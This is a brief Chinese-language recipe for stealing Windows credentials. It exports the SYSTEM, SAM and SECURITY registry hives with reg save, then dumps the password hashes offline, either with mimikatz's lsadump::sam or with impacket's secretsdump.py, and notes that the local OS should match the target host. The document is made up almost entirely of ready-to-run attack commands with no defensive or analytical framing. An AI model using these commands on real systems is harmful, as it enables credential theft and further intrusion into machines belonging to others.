1、下載下面3個文件
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
2、獲取密碼hash
方法1:使用mimikatz(本地機器系統與位數最好與目標主機保持一致)
mimikatz.exe “lsadump::sam /system:sys.hiv /sam:sam.hiv” exit
方法2:python腳本
python /root/impacket/examples/secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL